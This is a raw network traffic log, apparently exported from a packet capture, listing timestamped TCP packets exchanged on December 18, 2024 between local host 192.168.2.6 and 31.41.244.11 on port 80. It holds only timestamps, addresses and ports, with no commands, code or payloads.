                                                                                                                                                                  Dec 18, 2024 11:09:28.535664082 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.535696983 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.536802053 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.536814928 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.536847115 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.537902117 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.537940979 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.538043976 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.538084984 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.538450003 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.538491964 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.538635969 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.538676977 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.539539099 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.539583921 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.539731026 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.539772034 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.540755987 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.540770054 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.540803909 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.540818930 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.541800022 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.541816950 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.541846991 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.541862011 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.541889906 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.541902065 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.541929007 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.542501926 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.542557001 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.542566061 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.542607069 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.545241117 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.545303106 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.545358896 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.545396090 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.546233892 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.546302080 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.546389103 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.546401978 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.546428919 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.546448946 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.546519995 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.546566010 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.547133923 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.547188044 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.547271967 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.547347069 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.547981977 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.547998905 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.548037052 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.548058987 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.548963070 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.549015045 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.549112082 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.549153090 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.549626112 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.549683094 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.549768925 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.549817085 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.550208092 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.550291061 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.550488949 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.550537109 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.550818920 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.550863981 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.551057100 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.551100016 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.551541090 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.551554918 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.551589966 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.551615000 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.552251101 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.552300930 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.552553892 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.552593946 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.552882910 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.552926064 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.553036928 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.553077936 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.553461075 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.553472996 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.553493977 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.553513050 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.554018021 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.554074049 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.554090023 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.554125071 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.555248976 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.555325031 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.555385113 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.555422068 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.556636095 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.556684017 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.556893110 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.556941032 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.557878017 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.557919025 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.557930946 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.557964087 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.558520079 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.558562994 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.558629036 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.558665991 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.559242010 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.559286118 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.559325933 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.559365034 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.559920073 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.559969902 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.560165882 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.560209036 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.561209917 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.561255932 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.561424017 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.561467886 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.562537909 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.562587023 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.562593937 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.562627077 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.563383102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.563426018 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.563467026 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.563505888 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.564095020 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.564116955 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.564136028 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.564153910 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.564840078 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.564883947 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.564927101 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.564964056 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.566103935 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.566165924 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.566307068 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.566346884 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.567480087 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.567522049 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.567696095 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.567735910 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.568336010 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.568372011 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.568377972 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.568403959 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.569031954 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.569077015 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.569215059 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.569251060 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.569715023 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.569760084 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.569827080 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.569865942 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.570657969 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.570698977 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.570826054 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.570866108 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.571707964 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.571758032 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.571866035 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.571909904 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.572952986 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.573002100 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.573070049 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.573115110 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.573772907 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.573807001 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.573821068 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.573844910 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.574635029 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.574683905 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.574755907 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.574799061 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.575731993 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.575774908 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.575948954 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.575989008 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.576570988 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.576625109 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.576694965 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.576733112 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.577538967 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.577579021 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.719217062 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.719288111 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.719293118 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.719347000 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.719384909 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.719384909 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.720719099 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.720782995 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.720818996 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.720828056 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.720828056 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.723176003 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.723223925 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.723223925 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.723236084 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.723272085 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.723309040 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.723309040 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.723550081 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.723594904 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.724698067 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.724759102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.724797964 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.724797964 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.724816084 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.725429058 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.725461960 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.725469112 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.725469112 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.725501060 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.725542068 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.725542068 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.726526976 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.726540089 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.726571083 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.727876902 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.727888107 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.727899075 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.727931023 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.727931023 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.729391098 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.729402065 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.729423046 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.729437113 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.729437113 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.729511023 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.731044054 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.731057882 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.731091976 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.731698036 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.731709957 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.731755018 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.731755018 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.732619047 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.732639074 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.732733011 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.733236074 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.733304024 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.733334064 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.733458042 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.734074116 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.734179974 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.734210968 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.734294891 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.735373020 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.735461950 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.735507965 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.735586882 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.736989975 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.737051964 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.737092018 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.737092018 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.738325119 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.738337040 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.738380909 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.739397049 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.739448071 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.739483118 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.739521027 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.740114927 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.740173101 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.740190983 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.740230083 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.740820885 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.740902901 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.741043091 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.741079092 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.741530895 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.741651058 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.741683960 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.741730928 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.742311954 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.742324114 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.742352962 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.742610931 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.742916107 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.742958069 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.743103027 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.743205070 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.743540049 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.743634939 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.743665934 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.743774891 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.744122028 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.744182110 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.744206905 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.744250059 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.744952917 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.744965076 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.745006084 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.745006084 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.745595932 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.745671034 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.745692015 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.745774031 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.746591091 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.746658087 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.746691942 CET804991231.41.244.11192.168.2.6
